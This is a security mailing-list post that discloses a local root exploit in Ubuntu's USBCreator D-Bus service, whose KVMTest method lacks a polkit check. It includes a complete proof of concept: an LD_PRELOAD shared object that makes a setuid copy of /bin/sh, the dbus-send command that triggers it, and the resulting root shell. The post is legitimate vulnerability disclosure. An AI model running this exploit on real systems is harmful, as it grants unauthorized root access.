Date: Wed, 22 Apr 2015 16:50:08 -0700 From: Tavis Ormandy <taviso@...gle.com> To: oss-security@...ts.openwall.com Subject: USBCreator D-Bus service Hello, [as-per previous discussion on the vendors list, skipping closed discussion of low-severity issue] On my Ubuntu VM, I have a D-Bus service listening on com.ubuntu.USBCreator. As far as I can tell, this is installed by default. It looks like the author intended for all the methods to call check_polkit, but KVMTest doesn't. This seems like an obvious mistake, and the following appears to work on my machine: $ cat > test.c void __attribute__((constructor)) init (void) { chown("/tmp/test", 0, 0); chmod("/tmp/test", 04755); } ^D $ gcc -shared -fPIC -o /tmp/test.so test.c $ cp /bin/sh /tmp/test $ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so" method return sender=:1.4364 -> dest=:1.7427 reply_serial=2 $ ls -l /tmp/test -rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test $ /tmp/test # id euid=0(root) groups=0(root) Thanks, Tavis.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.